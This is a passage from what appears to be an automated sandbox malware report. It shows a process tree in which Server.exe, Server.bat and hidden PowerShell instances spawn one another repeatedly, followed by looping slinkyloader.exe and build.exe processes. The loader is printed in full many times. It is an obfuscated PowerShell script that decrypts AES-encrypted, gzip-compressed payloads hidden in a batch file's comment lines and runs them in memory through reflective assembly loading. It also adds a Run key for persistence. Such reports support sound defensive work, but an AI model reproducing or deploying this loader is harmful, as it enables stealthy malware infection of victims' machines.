([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        18⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:9180
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        19⤵
        Adds Run key to start application
        
        PID:9512
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        20⤵
        
        PID:2044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        21⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:7136
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        22⤵
        Adds Run key to start application
        
        PID:10760
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        23⤵
        
        PID:6696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        24⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:10804
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        25⤵
        Adds Run key to start application
        
        PID:12020
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        26⤵
        
        PID:8376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        27⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        28⤵
        
        PID:12872
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        29⤵
        
        PID:12920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:13164
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        31⤵
        
        PID:4120
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        32⤵
        
        PID:9944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        34⤵
        
        PID:11280
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        35⤵
        
        PID:13204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10676
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        37⤵
        
        PID:10868
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        38⤵
        
        PID:8776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8468
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        40⤵
        
        PID:2976
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        41⤵
        
        PID:14000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:14136
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        43⤵
        
        PID:13172
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "Server.bat"
        44⤵
        
        PID:10996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jImq1qZndYRvzAGV39lUP9VSLjY54oOLR91ZbQQkPBU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6NNpPKZ+esK8WDSba048Vw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KbIMF=New-Object System.IO.MemoryStream(,$param_var); $etmts=New-Object System.IO.MemoryStream; $DDHTk=New-Object System.IO.Compression.GZipStream($KbIMF, [IO.Compression.CompressionMode]::Decompress); $DDHTk.CopyTo($etmts); $DDHTk.Dispose(); $KbIMF.Dispose(); $etmts.Dispose(); $etmts.ToArray();}function execute_function($param_var,$param2_var){ $JYoaF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LnAdI=$JYoaF.EntryPoint; $LnAdI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\Server.bat';$YpgaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\Server.bat').Split([Environment]::NewLine);foreach ($nYHKS in $YpgaC) { if ($nYHKS.StartsWith(':: ')) { $SCayT=$nYHKS.Substring(3); break; }}$payloads_var=[string[]]$SCayT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10456
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        43⤵
        
        PID:9704
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        44⤵
        
        PID:11524
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        44⤵
        
        PID:3760
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        45⤵
        
        PID:9228
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        45⤵
        
        PID:11008
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        46⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        46⤵
        
        PID:11500
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        47⤵
        
        PID:10836
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        40⤵
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        41⤵
        
        PID:13448
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        41⤵
        
        PID:10724
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        42⤵
        
        PID:13136
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        42⤵
        
        PID:11032
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        43⤵
        
        PID:9020
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        43⤵
        
        PID:7424
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        44⤵
        
        PID:14144
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        44⤵
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        45⤵
        
        PID:9820
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        45⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        46⤵
        
        PID:7736
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        46⤵
        
        PID:7264
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        47⤵
        
        PID:8412
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        47⤵
        
        PID:12572
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        48⤵
        
        PID:12308
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        48⤵
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        49⤵
        
        PID:11092
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        49⤵
        
        PID:12972
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        50⤵
        
        PID:12052
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        50⤵
        
        PID:12876
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        51⤵
        
        PID:12552
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        51⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        52⤵
        
        PID:12824
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        52⤵
        
        PID:11724
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        37⤵
        
        PID:7492
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        38⤵
        
        PID:2120
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        39⤵
        
        PID:11096
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        38⤵
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        39⤵
        
        PID:1416
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        39⤵
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        40⤵
        
